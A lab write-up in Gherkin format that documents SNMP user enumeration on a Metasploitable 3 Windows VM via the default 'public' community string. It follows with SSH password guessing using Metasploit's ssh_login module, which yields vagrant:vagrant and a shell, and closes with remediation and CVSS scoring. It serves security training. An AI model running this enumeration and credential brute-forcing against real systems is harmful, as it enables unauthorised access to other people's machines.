## Version 1.4.1
## language: en

Feature:
  TOE:
    Metasploitable 3
  Category:
    Information Leakage
  Location:
    metasploitable_w2k8:161 UDP
  CWE:
    CWE-213: Intentional Information Exposure -base-
      https://cwe.mitre.org/data/definitions/213.html
    CWE-0200: Information Exposure -class-
      https://cwe.mitre.org/data/definitions/200.html
  CAPEC:
    CAPEC-150: Collect Data from Common Resource Locations -standard-
      http://capec.mitre.org/data/definitions/150.html
    CAPEC-116: Excavation -meta-
      http://capec.mitre.org/data/definitions/116.html
  Rule:
    REQ.142: https://fluidattacks.com/web/rules/142/
  Goal:
    Get system usernames
  Recommendation:
    Don't keep sensitive services open to the public and change default settings

  Background:
  Hacker's software:
    | <Software name>       | <Version> |
    | Kali Linux            | Rolling   |
    | Nmap                  | 7.70      |
    | snmpenum              | 1.0       |
    | Metasploit            | 5.0.35    |
  TOE information:
    Given I am running Metasploitable3 Windows in a VM at
    """
    172.28.128.4
    """

  Scenario: Normal use case
  Normal site navigation
    When I am a sysadmin
    Then I have a SNMP service running to help me manage my network

  Scenario: Static detection
  No code available

  Scenario: Dynamic detection
  Getting system info
    Given I scan the target machine with Nmap
    And find a ton of open ports
    """
    $ nmap 172.28.128.4
    Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-19 17:08 -05
    Nmap scan report for 172.28.128.4
    ...
    22/tcp    open  ssh
    ...
    161/udp open|filtered snmp
    ...
    """
    Then I notice UDP port 161 is open, so there's a SNMP service running
    Then I use snmpenum to see if maybe the default community "public" works
    And it does, I get the system information including active users
    """
    ...
    ----------------------------------------
        USERS
    ----------------------------------------

    sshd
    Guest
    greedo
    vagrant
    han_solo
    kylo_ren
    boba_fett
    chewbacca
    ben_kenobi
    jabba_hutt
    artoo_detoo
    c_three_pio
    darth_vader
    leia_organa
    sshd_server
    jarjar_binks
    Administrator
    luke_skywalker
    anakin_skywalker
    lando_calrissian
    ...
    """

  Scenario: Exploitation
  Using weak passwords to enter the system
    Given I have a list of users for the machine
    And I know the SSH port "22" is open
    Then I use the "ssh_login" metasploit module to try common passwords
    And include the usernames themselves in the list
    Then I fin  a set of credentials that works
    """
    msf5 auxiliary(scanner/ssh/ssh_login) > run

    [+] 172.28.128.4:22 - Success: 'vagrant:vagrant'
    """
    Then I have access to the machine
    """
    $ ssh vagrant@172.28.128.4
    vagrant@172.28.128.4's password:
    Last login: Fri Jul 12 14:42:24 2019 from 172.28.128.1
    -sh-4.3$ whoami
    metasploitable3\vagrant
    """

  Scenario: Remediation
  Access control
    Given I change the community string for the SNMP service
    Then an attacker can't easily access the system information via SNMP

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    7.5/10 (High) - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
  Temporal: Attributes that measure the exploit's popularity and fixability
    7.0/10 (High) - E:F/RL:O/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    7.0/10 (High) - CR:M/IR:M/AR:M

  Scenario: Correlations
    No correlations have been found to this date 2019-07-22
